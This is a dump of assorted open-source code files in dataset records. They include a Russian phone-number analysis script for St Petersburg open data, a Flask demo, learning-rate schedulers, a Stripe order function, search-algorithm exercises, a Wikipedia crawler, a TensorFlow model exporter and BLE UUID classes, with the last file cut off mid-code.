\"https://classif.gov.spb.ru/irsi/7808025993-education/structure_version/342/?page=1&per_page=50\",\n \"dataset/education.csv\",\n 
\"Телефон\"],\n\"Катки и лыжные трассы Санкт-Петербурга (Версия №25 от 08.12.2022)\":\n [\"https://classif.gov.spb.ru/irsi/7814348015-Katki-i-lyzhnye-trassy-SPbtwo/structure_version/618/?page=5&per_page=50\",\n \"dataset/Katki-i-lyzhnye-trassy-Sankt-Peterburga.csv\",\n \"Телефон(ы)\"],\n\"Информация о лечебно-профилактических учреждениях Санкт-Петербурга (Версия №10 от 15.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7808043833-info_health_service/structure_version/327/?page=4&per_page=50\",\n \"dataset/info_health_service.csv\",\n \"Телефон\"],\n\"Сведения о судебных участках мировых судей Санкт-Петербурга (Версия №1 от 18.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7842005651-svedeniya-o-sudebnyh-uchastkah-mirovyh-sudej-sankt-peterburga/structure_version/438/?page=5&per_page=50\",\n \"dataset/svedeniya-o-sudebnyh-uchastkah-mirovyh-sudej-sankt-peterburga.csv\",\n \"Телефон / факс\"],\n\"Перечень ресурсоснабжающих организаций - владельцев сетей инженерно-технического обеспечения и электрических сетей в Санкт-Петербурге (Версия №10 от 16.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7825363978-perechen-resursosnabzhayushih-organizacij-vladelcev-setej-inzhenerno-tehnicheskogo-obespecheniya-i-elektricheskih-setej-v-sankt-peterburge/structure_version/387/?page=1&per_page=50\",\n \"dataset/perechen-resursosnabzhayushih-organizacij-vladelcev-setej-inzhenerno-tehnicheskogo-obespecheniya-i-elektricheskih-setej-v-sankt-peterburge.csv\",\n \"Телефон для справок\"],\n\"Перечень образовательных организаций (школ, гимназий, лицеев) на территории района Санкт-Петербурга (Версия №10 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002078-Perechen-obrazovatelnyh-organizacij/structure_version/361/?page=10&per_page=50\",\n \"dataset/Perechen-obrazovatelnyh-organizacij-na-territorii-rajona-Sankt-Peterburga.csv\",\n \"Телефон\"],\n\"Государственные бюджетные образовательные учреждения Санкт-Петербурга, находящиеся в ведении Комитета по образованию (Версия №10 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002053-State_educational_institutions_of_Saint_Petersburg_under_control_of_the_Committee/structure_version/328/?page=1&per_page=50\",\n \"dataset/Gosudarstvennye-byudzhetnye-obrazovatelnye-uchrezhdeniya-Sankt-Peterburga-nahodyashiesya-v-vedenii-Komiteta-po-obrazovaniyu.csv\",\n \"Телефон\"],\n\"Информация о кладбищах Санкт-Петербурга, на которых предоставляются участки земли для погребения (Версия №10 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7838482852-Informaciya-o-kladbishah-Sankt-Peterburga-na-kotoryh-predostavlyayutsya-uchastki-zemli-dlya-pogrebeniya/structure_version/504/?page=2&per_page=50\",\n \"dataset/Informaciya-o-kladbishah-Sankt-Peterburga-na-kotoryh-predostavlyayutsya-uchastki-zemli-dlya-pogrebeniya.csv\",\n \"Телефон\"],\n\n}\n\nclass Analitic_Phone():\n def __init__(self, path: str, colum:str):\n self.path = path\n self.colum = colum\n\n # Возвращает датафрейм по столбцу телефона\n def read_csv_colum(self):\n col = pd.read_csv(self.path, delimiter=',')\n return col[self.colum]\n\n # количество записей в наборе\n def count_csv(self):\n count_csv = pd.read_csv(self.path).count()\n return count_csv[0]\n\n # количество не пустых номеров\n def count_not_null_phone(self):\n cnt=0\n for i in self.read_csv_colum():\n if isinstance(i, str):\n if re.sub(r'\\D', \"\", i) != \"\":\n cnt=cnt+1\n return cnt\n\n #количество городских телефонных номеров\n def count_gor_phone(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, 
str):\n if re.search(\",\", phone):\n phone=phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n else:\n phone=re.sub(r'\\D',\"\",phone)\n if type(phone) is list:\n for i in phone:\n i = re.sub(r'\\D', \"\", i)\n if re.search(\"^.812\", i) or re.search(\"^812\", i) or len(i) == 7:\n count_phone = count_phone + 1\n #print(i)\n elif re.search(\"^.812\", phone) or re.search(\"^812\", phone) or len(phone) == 7:\n count_phone = count_phone + 1\n #print(phone)\n return count_phone\n\n # количество мобильных телефонных номеров\n def count_mobile_phone(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n else:\n phone = re.sub(r'\\D', \"\", phone)\n if type(phone) is list:\n for i in phone:\n i = re.sub(r'\\D', \"\", i)\n if re.search(r\"^.9\", i) and len(i) == 11:\n #print(i)\n count_phone = count_phone + 1\n elif re.search(r\"^.9\", phone) and len(phone) == 11:\n #print(phone)\n count_phone = count_phone + 1\n return count_phone\n\n # количество телефонных номеров, с указанием кода страны\"\" (напр., +7-..., но не 8-...)\n def cont_code_country(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n cnt=phone.count(\"+7\")\n count_phone = count_phone + cnt\n return count_phone\n\n # количество телефонных номеров с указанием кода города или кода оператора сотовой связи\n def cont_operator_mobile(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n else:\n phone = re.sub(r'\\D', \"\", phone)\n if type(phone) is list:\n for i in phone:\n i = re.sub(r'\\D', \"\", i)\n if re.search(\"^.812\", i) or re.search(\"^812\", i) or (re.search(\"^.9[0-9][0-9]\", i) and len(i)==11):\n count_phone = count_phone + 1\n elif re.search(\"^.812\", phone) or re.search(\"^812\", phone) or (re.search(\"^.9[0-9][0-9]\", phone) and len(phone)==11):\n count_phone = count_phone + 1\n return count_phone\n\n # количество телефонных номеров, в записи которых используются пробелы\n def space_number(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n if type(phone) is list:\n for i in phone:\n i = i.strip()\n i = re.sub(\"^[А-Яа-я]+([\\W]+)?[\\s]\", \"\", i)\n\n if re.search(\" \", i):\n count_phone = count_phone + 1\n else:\n phone = re.sub(\"^[А-Яа-я]+([\\W]+)?[\\s]\", \"\", phone)\n if re.search(\" \", phone):\n count_phone = count_phone + 1\n return count_phone\n\n # количество телефонных номеров, в записи которых используются скобки\n def scop_number(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = 
phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n if type(phone) is list:\n for i in phone:\n i = i.strip()\n if re.search(\"[()]\", i):\n count_phone = count_phone + 1\n elif re.search(\"[()]\", phone):\n count_phone = count_phone + 1\n return count_phone\n\n # количество телефонных номеров, в записи которых используются дефисы\n def dash_number(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n if type(phone) is list:\n for i in phone:\n i = i.strip()\n if re.search(\"[-]\", i):\n #print(i)\n count_phone = count_phone + 1\n elif re.search(\"[-]\", phone):\n # print(phone)\n count_phone = count_phone + 1\n return count_phone\n\n def view_table(self, namedataset, linkdataset ):\n newdata = datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")\n data = [{'Название набора данных': namedataset, 'Ссылка на набор данных': linkdataset, 'Количество записей в наборе': self.count_csv(),\n \"Название столбца с телефонным номером\":self.colum, 'Количество не пустых телефонных номеров':self.count_not_null_phone(),\n 'Количество городских телефонных номеров':self.count_gor_phone(),'Количество мобильных телефонных номеров':self.count_mobile_phone(),\n 'Количество телефонных номеров, с указанием кода страны':self.cont_code_country(),'Количество телефонных номеров с указанием кода города или кода оператора сотовой связи':self.cont_operator_mobile(),\n 'Количество телефонных номеров, в записи которых используются пробелы':self.space_number(), 'Количество телефонных номеров, в записи которых используются скобки':self.scop_number(),\n 'Количество телефонных номеров, в записи которых используются дефисы':self.dash_number(),\n }]\n view = pd.DataFrame(data)\n view.to_csv(f\"{namedataset}_{newdata}.csv\", index=False)\n print(tabulate(view, headers=view.keys(), tablefmt=\"grid\", showindex=\"always\"))\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n for name, link in link_dataset.items():\n dt = Analitic_Phone(link[1], link[2], )\n dt.view_table(name, link[0])\n","repo_name":"veron1213/PK_PPS","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17338,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"8427128570","text":"from flask import Flask, render_template\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import Employee, Department, db, connect_db\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///employees'\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SECRET_KEY'] = \"abc123\"\n\nconnect_db(app)\n\ntoolbar = DebugToolbarExtension(app)\n\n\n@app.route(\"/phones\")\ndef phone_list():\n \"\"\"Get list of users & dept phones.\n\n This version will be a 'n+1 query' --- it will query once for all\n users, and then for each department.\n\n There's a way to tell SQLAlchemy to load all the data in a single query,\n but don't worry about this for now.\n \"\"\"\n\n emps = Employee.query.all()\n return render_template(\"phones.html\", 
emps=emps)\n","repo_name":"Zanderfeldt/Springboard-Exercises","sub_path":"23-SQLAlchemy/sqla-associations-demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"19209584752","text":"import numpy as np\n\n\nclass Piecewise_Lr_schedule:\n def __init__(self, opt, milestones, gamma=0.1):\n self.milestones = milestones\n self.gamma = gamma\n self.opt = opt\n self._step = 0\n\n def step(self, epoch=None):\n if epoch is not None:\n self._step = epoch\n else:\n self._step += 1\n\n if self._step in self.milestones:\n lr = self.opt.param_groups[0][\"lr\"]\n lr *= self.gamma\n self.opt.param_groups[0].update(lr=lr)\n\n\nclass Cosine_Lr_schedule:\n def __init__(self, opt, max_lr, max_epoch):\n self.opt = opt\n self.max_lr = max_lr\n self.max_epoch = max_epoch\n self._step = 0\n\n def step(self, epoch=None):\n if epoch is not None:\n self._step = epoch\n else:\n self._step += 1\n\n lr = self.max_lr * 0.5 * (1 + np.cos(self._step / self.max_epoch * np.pi))\n self.opt.param_groups[0].update(lr=lr)\n","repo_name":"theFool32/AT-Framework","sub_path":"utils/lr_scheduler.py","file_name":"lr_scheduler.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"7505007322","text":"from time import sleep\nimport collections\nimport json\n\ndef execute(event, context): \n id = 1\n params = event['queryStringParameters']\n if isinstance(params, collections.Mapping):\n id = params.get('id', 1)\n \n sleep(0.6)\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Cache-Control\": \"no-cache, no-store, must-revalidate\"\n },\n \"body\": json.dumps({'id': id})\n }","repo_name":"edjus/arquitectura_software_tp2","sub_path":"python-lambda/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30430196076","text":"import stripe\n\nstripe.api_key = \"sk_test_fc0heHRqHr9mMCIU6wPs6MoL\"\n\n\ndef create_order(data):\n if not data['token']:\n return 'Error: no token supplied.'\n\n customer = stripe.Customer.create(source=data['token'])\n\n cus_info = customer['sources']['data'][0]\n shipping = {\n \"name\": cus_info['name'],\n \"address\": {\n \"line1\": cus_info['address_line1'],\n \"city\": cus_info['address_city'],\n \"country\": cus_info['address_country'],\n \"postal_code\": cus_info['address_zip']\n },\n }\n\n items_list = [{'type': 'sku', 'parent': item['uid'], 'quantity': item['quantity']} for item in data['items']]\n\n stripe.Order.create(\n currency='usd',\n items=items_list,\n customer=customer.id,\n shipping=shipping,\n email=data['email']\n )\n\n return 'ok'\n","repo_name":"cwackerfuss/stickerstack","sub_path":"server/tasks/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17631638830","text":"import BasicTree as bt #import the basic tree library\n\n#The main depth-first search function, it calls a helper function with the correct parameters\n#tree ----- the BasicTree tree variable setup beforehand, this is what will be searched (could also be called the state space)\n#val ----- the value to search for\n#This will return a string which is the path needed to take to get to val\ndef DFS(tree, val):\n return DFSRecursive(tree.root, 
tree.layers, val)\n\n#This is what's known as a recursive helper function, it will do the heavy lifting of the algorithm\ndef DFSRecursive(node, numLayers, val):\n #remember, every bit of code here will be run for every node called, not just the root one\n \n if (node.data == val): #if we have reached a node with data equal to the val...\n return str(node.data) #return the data as a string\n elif (numLayers <= 0): #if we have exhausted all layers...\n return None #return None type, this means the val wasn't found\n else: #otherwise...\n cutoff = False #initialize a cutoff variable, this will be used to flag if all children are leaf nodes and don't contain our desired val\n for n in node.children: #for every child...\n result = DFSRecursive(n, numLayers-1, val) #the result for every child should be the result of it's children (this is where the recursion happens)\n if (result == None): #if the result is None, we have reached the end layer\n cutoff = True #flag with the cutoff variable\n else: #otherwise we have found a matching node!\n return str(node.data) + '->' + result #return the current node's data val with the result (this node must lead to the solution)\n if (cutoff): #if we hit a cutoff...\n return None #return None\n \ntree = bt.Tree() #create the tree\ntree.createTree(4) #populate the tree with 4 layers of random nodes\ntree.printTree() #print to console\nprint()\nprint(\"Path to 'A': \" + str(DFS(tree, 'A')))\nprint(\"Path to 'F': \" + str(DFS(tree, 'F')))\nprint(\"Path to 'X': \" + str(DFS(tree, 'X')))\nprint(\"Path to 'Z': \" + str(DFS(tree, 'Z')))\n","repo_name":"And1210/IntroToAICourseCode","sub_path":"Week 1 MOD 2/depthFirstSearch.py","file_name":"depthFirstSearch.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22462625891","text":"import os\nimport shutil\nimport time\nimport unittest\nimport uuid\n\nimport torch\nfrom mmcv.parallel import MMDataParallel\nfrom tests.ut_config import TMP_DIR_LOCAL\n\nfrom easycv.datasets import build_dataloader\nfrom easycv.file import io\nfrom easycv.hooks.dino_hook import DINOHook\nfrom easycv.runner import EVRunner\nfrom easycv.utils.logger import get_root_logger\n\n\nclass DummyDataset(object):\n\n def __getitem__(self, idx):\n output = {'img': [torch.randn(3, 224, 224), torch.randn(3, 224, 224)]}\n return output\n\n def __len__(self):\n return 4\n\n\ndef _build_model():\n from easycv.models import build_model\n model = dict(\n type='DINO',\n pretrained=None,\n train_preprocess=[\n 'randomGrayScale', 'gaussianBlur', 'solarize'\n ], # 2+6 view, has different augment pipeline, dino is complex\n backbone=dict(\n type='PytorchImageModelWrapper',\n # deit(224)\n model_name='dynamic_deit_small_p16',\n ),\n # swav need mulit crop ,doesn't support vit based model\n neck=dict(type='DINONeck', in_dim=384, out_dim=65536),\n config=dict(\n use_bn_in_head=False,\n norm_last_layer=True,\n ))\n\n return build_model(model)\n\n\nclass DINOHookTest(unittest.TestCase):\n\n def setUp(self):\n print(('Testing %s.%s' % (type(self).__name__, self._testMethodName)))\n\n def test_byol_hook(self):\n work_dir = os.path.join(TMP_DIR_LOCAL, uuid.uuid4().hex)\n io.makedirs(work_dir)\n timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n log_file = os.path.join(work_dir, '{}.log'.format(timestamp))\n logger = get_root_logger(log_file=log_file)\n\n model = _build_model()\n model = MMDataParallel(model, device_ids=[0]).cuda()\n optimizer = 
torch.optim.SGD(model.parameters(), lr=0.02, momentum=0.95)\n runner = EVRunner(\n model=model, work_dir=work_dir, optimizer=optimizer, logger=logger)\n\n dino_hook = DINOHook()\n runner.register_hook(dino_hook)\n\n dataset = DummyDataset()\n dataloader = build_dataloader(\n dataset, imgs_per_gpu=2, workers_per_gpu=1)\n runner.data_loader = [dataloader]\n runner.run([dataloader], [('train', 1)], 1)\n self.assertEqual(runner.optimizer.param_groups[0]['weight_decay'],\n 0.22)\n\n shutil.rmtree(work_dir, ignore_errors=True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"alibaba/EasyCV","sub_path":"tests/test_hooks/test_dino_hook.py","file_name":"test_dino_hook.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":1565,"dataset":"github-code","pt":"60"} +{"seq_id":"25236177369","text":"force = {}\n\nwhile True:\n input_line = input()\n if input_line == \"Lumpawaroo\":\n break\n else:\n if \"|\" in input_line:\n split_input = input_line.split(\" | \")\n force_side = split_input[0]\n force_user = split_input[1]\n is_found = False\n for key, value in force.items():\n if force_user in value:\n is_found = True\n if not is_found:\n if force_side not in force:\n force[force_side] = [force_user]\n else:\n if force_user not in force[force_side]:\n force[force_side].append(force_user)\n\n elif \"->\" in input_line:\n split_input = input_line.split(\" -> \")\n force_side = split_input[1]\n force_user = split_input[0]\n\n for key, value in force.items():\n if force_user in value:\n force[key].pop(value.index(force_user))\n\n if force_side not in force:\n force[force_side] = [force_user]\n else:\n force[force_side].append(force_user)\n\n print(f\"{force_user} joins the {force_side} side!\")\n\nsorted_force = sorted(force.items(), key=lambda x: (-len(x[1]), x[0]))\n\nfor side in sorted_force:\n if len(side[1]) > 0:\n print(f\"Side: {side[0]}, Members: {len(side[1])}\")\n for u in sorted(side[1]):\n print(f\"! 
{u}\")","repo_name":"ivelinakaraivanova/SoftUniPythonFundamentals","sub_path":"src/Dictionaries_Exercise/09_ForceBook.py","file_name":"09_ForceBook.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42627713332","text":"import re\nimport time\nfrom logging import *\n\nfrom src.Graph import Graph\nfrom src.Saver import Saver\nfrom src.Queue import Queue\nfrom src.Processor import Processor\nfrom src.Downloader import Downloader\nfrom src.Database import Database\n\n\nclass Crawler:\n def __init__(self,\n queue: Queue,\n processor: Processor,\n downloader: Downloader,\n graph: Graph,\n saver: Saver,\n db: Database,\n host: str):\n self.__graph = graph\n self.__downloader = downloader\n self.__queue = queue\n self.__proc = processor\n self.__saver = saver\n self.__db = db\n self.__host = host\n\n def start(self):\n log(INFO, 'Started')\n while True:\n try:\n for url in self.__queue.get_consumer():\n log(INFO, url)\n print(1)\n page = self.__downloader.load(url, self.__host)\n\n body, links, true_url = self.__proc.parse(page)\n old_url = None\n if true_url is not None:\n old_url = url\n url = true_url\n\n links = set(filter(Crawler.is_internal, links))\n if url in links:\n links.remove(url)\n unwatched_links = self.__db.new_set(links)\n\n for l in unwatched_links:\n self.__queue.push(l)\n\n if self.article_url(url):\n key = Crawler.get_key(url)\n path = self.__saver.save(key, body)\n self.__db.save_path(key, path)\n self.__graph.add(key, map(Crawler.get_key, filter(self.article_url, links)))\n if old_url is not None:\n self.__graph.add(old_url, [url])\n\n self.__db.add(unwatched_links)\n self.__queue.ack()\n self.__db.commit()\n except Exception as e:\n log(ERROR, 'Exception: ', e, 'url: ' + url, 'unwatched_links: ' + str(unwatched_links))\n self.__db.rollback()\n time.sleep(30)\n\n PATH_PREFIX = '/wiki'\n\n @staticmethod\n def is_internal(path: str):\n return path.startswith(Crawler.PATH_PREFIX)\n\n @staticmethod\n def get_key(path: str):\n return path[len(f'{Crawler.PATH_PREFIX}/'):]\n\n @staticmethod\n def article_url(link: str):\n return link.startswith(Crawler.PATH_PREFIX) \\\n and re.search(r':(?!_)', link) is None \\\n and link != f'{Crawler.PATH_PREFIX}/Main_Page'\n","repo_name":"pashatyl/crawler","sub_path":"src/Crawler.py","file_name":"Crawler.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"10701378348","text":"#coding=utf-8\nfrom __future__ import print_function, unicode_literals\nimport tensorflow as tf\nimport os\n\n\ntf.flags.DEFINE_string(\"last_checkpoint\", \"./runs/1505182128/checkpoints\", \"上次暂存点位置\")\nFLAGS = tf.flags.FLAGS\n\n\nexport_path = \"mnist_models\"\nmodel_version = '1'\nexport_path = os.path.join(export_path, model_version)\n\nprint('Exporting trained model to', export_path)\n\nsess = tf.InteractiveSession()\n\ngraph = tf.Graph()\nwith graph.as_default():\n sess = tf.InteractiveSession()\n with sess.as_default():\n checkpoint_file = tf.train.latest_checkpoint(FLAGS.last_checkpoint)\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(sess, checkpoint_file)\n\n table = tf.contrib.lookup.index_to_string_table_from_tensor(\n tf.constant([str(i) for i in range(10)]))\n\n\n # 模型构建器\n builder = tf.saved_model.builder.SavedModelBuilder(export_path)\n\n # 计算图中部分节点\n x = graph.get_operation_by_name('inputs').outputs[0]\n y = 
graph.get_operation_by_name('y').outputs[0]\n\n tensor_info_x = tf.saved_model.utils.build_tensor_info(x) # 输入\n tensor_info_y = tf.saved_model.utils.build_tensor_info(y) # 前向传播结果\n\n classification_inputs = tf.saved_model.utils.build_tensor_info(x)\n classification_outputs_classes = tf.saved_model.utils.build_tensor_info(graph.get_operation_by_name('prediction_classes').outputs[0]) # 预测分类\n classification_outputs_scores = tf.saved_model.utils.build_tensor_info(graph.get_operation_by_name('classification_outputs_scores').outputs[0]) # 预测分类的得分\n\n # 分类签名\n classification_signature = (\n tf.saved_model.signature_def_utils.build_signature_def(\n inputs={\n tf.saved_model.signature_constants.CLASSIFY_INPUTS: classification_inputs\n },\n outputs={\n tf.saved_model.signature_constants.CLASSIFY_OUTPUT_CLASSES:\n classification_outputs_classes,\n tf.saved_model.signature_constants.CLASSIFY_OUTPUT_SCORES:\n classification_outputs_scores\n },\n method_name=tf.saved_model.signature_constants.CLASSIFY_METHOD_NAME))\n\n # 预言签名\n prediction_signature = (\n tf.saved_model.signature_def_utils.build_signature_def(\n inputs={'images': tensor_info_x},\n outputs={'scores': tensor_info_y},\n method_name=tf.saved_model.signature_constants.PREDICT_METHOD_NAME))\n\n legacy_init_op = tf.group(tf.tables_initializer(), name='legacy_init_op')\n\n builder.add_meta_graph_and_variables(\n sess, [tf.saved_model.tag_constants.SERVING], # 通用标记\n signature_def_map={\n 'predict_images':\n prediction_signature,\n tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:\n classification_signature,\n },\n legacy_init_op=legacy_init_op)\n\n builder.save()\n print(\"导出成功\")","repo_name":"mikuh/tf_code","sub_path":"example_mnist/export_model.py","file_name":"export_model.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"73813967549","text":"# 시간초과\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\n\ngraph = [0]\n\nfor _ in range(n):\n graph += list(map(int, input().split()))\n\nstart = 1\n\nq = deque([start])\nreached = False\nwhile q:\n now = q.popleft()\n if now == n*n:\n reached = True\n break\n else:\n jump = graph[now]\n if now % n != 0:\n if now % n + 1 * jump <= n:\n q.append(now + 1 * jump)\n \n if now + n * jump <= n*n:\n q.append(now + n * jump)\n\n \nif reached:\n print(\"HaruHaru\")\nelse:\n print(\"Hing\")","repo_name":"hyena0608/AlgorithmStudy","sub_path":"백준/파이썬/16173_mycode.py","file_name":"16173_mycode.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35924849340","text":"from enum import Enum\r\nfrom types import NoneType\r\nimport logging\r\nfrom blatann.nrf.nrf_dll_load import driver\r\nimport blatann.nrf.nrf_driver_types as util\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nBLE_CONN_HANDLE_INVALID = driver.BLE_CONN_HANDLE_INVALID\r\n\r\n\r\nclass BLEUUIDBase(object):\r\n BLE_UUID_TYPE_BLE = driver.BLE_UUID_TYPE_BLE\r\n\r\n def __init__(self, vs_uuid_base=None, uuid_type=None):\r\n assert isinstance(vs_uuid_base, (list, NoneType)), 'Invalid argument type'\r\n assert isinstance(uuid_type, (int, long, NoneType)), 'Invalid argument type'\r\n if vs_uuid_base is None:\r\n self.base = [0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,\r\n 0x80, 0x00, 0x00, 0x80, 0x5F, 0x9B, 0x34, 0xFB]\r\n self.def_base = True\r\n else:\r\n self.base = vs_uuid_base\r\n 
self.def_base = False\r\n\r\n if uuid_type is None and self.def_base:\r\n self.type = driver.BLE_UUID_TYPE_BLE\r\n else:\r\n self.type = uuid_type if uuid_type is not None else 0\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, BLEUUIDBase):\r\n return False\r\n if self.base != other.base:\r\n return False\r\n if self.type != other.type:\r\n return False\r\n return True\r\n\r\n def __ne__(self, other):\r\n return not self.__eq__(other)\r\n\r\n @classmethod\r\n def from_c(cls, uuid):\r\n if uuid.type == driver.BLE_UUID_TYPE_BLE:\r\n return cls(uuid_type=uuid.type)\r\n else:\r\n return cls([0] * 16, uuid_type=uuid.type) # TODO: Hmmmm? [] or [None]*16? what?\r\n\r\n @classmethod\r\n def from_uuid128_array(cls, uuid128_array):\r\n msb_list = uuid128_array[::-1]\r\n return cls(msb_list)\r\n\r\n def to_c(self):\r\n lsb_list = self.base[::-1]\r\n self.__array = util.list_to_uint8_array(lsb_list)\r\n uuid = driver.ble_uuid128_t()\r\n uuid.uuid128 = self.__array.cast()\r\n return uuid\r\n\r\n\r\nclass BLEUUID(object):\r\n class Standard(Enum):\r\n unknown = 0x0000\r\n service_primary = 0x2800\r\n service_secondary = 0x2801\r\n characteristic = 0x2803\r\n cccd = 0x2902\r\n battery_level = 0x2A19\r\n heart_rate = 0x2A37\r\n\r\n def __init__(self, value, base=BLEUUIDBase()):\r\n assert isinstance(base, BLEUUIDBase), 'Invalid argument type'\r\n self.base = base\r\n if self.base.def_base:\r\n try:\r\n self.value = value if isinstance(value, BLEUUID.Standard) else BLEUUID.Standard(value)\r\n except ValueError:\r\n self.value = value\r\n else:\r\n self.value = value\r\n\r\n def get_value(self):\r\n if isinstance(self.value, BLEUUID.Standard):\r\n return self.value.value\r\n return self.value\r\n\r\n def as_array(self):\r\n base_and_value = self.base.base[:]\r\n base_and_value[2] = (self.get_value() >> 8) & 0xff\r\n base_and_value[3] = (self.get_value() >> 0) & 0xff\r\n return base_and_value\r\n\r\n def __str__(self):\r\n if isinstance(self.value, BLEUUID.Standard):\r\n return '0x{:04X} ({})'.format(self.value.value, self.value)\r\n elif self.base.type == driver.BLE_UUID_TYPE_BLE and self.base.def_base:\r\n return '0x{:04X}'.format(self.value)\r\n else:\r\n base_and_value = self.base.base[:]\r\n base_and_value[2] = (self.value >> 8) & 0xff\r\n base_and_value[3] = (self.value >> 0) & 0xff\r\n return '0x{}'.format(''.join(['{:02X}'.format(i) for i in base_and_value]))\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, BLEUUID.Standard):\r\n return self.get_value() == other.value\r\n if not isinstance(other, BLEUUID):\r\n return False\r\n if not self.base == other.base:\r\n return False\r\n if not self.value == other.value:\r\n return False\r\n return True\r\n\r\n def __ne__(self, other):\r\n return not self.__eq__(other)\r\n\r\n def __hash__(self):\r\n return hash(str(self))\r\n\r\n @classmethod\r\n def from_c(cls, uuid):\r\n return cls(value=uuid.uuid, base=BLEUUIDBase.from_c(uuid)) # TODO: Is this correct?\r\n\r\n @classmethod\r\n def from_uuid128(cls, uuid128):\r\n uuid = util.uint8_array_to_list(uuid128.uuid, 16)\r\n return cls.from_array(uuid)\r\n\r\n def to_c(self):\r\n assert self.base.type is not None, 'Vendor specific UUID not registered'\r\n uuid = driver.ble_uuid_t()\r\n if isinstance(self.value, BLEUUID.Standard):\r\n uuid.uuid = self.value.value\r\n else:\r\n uuid.uuid = self.value\r\n uuid.type = self.base.type\r\n return uuid\r\n\r\n @classmethod\r\n def from_array(cls, uuid_array_lt):\r\n base = 
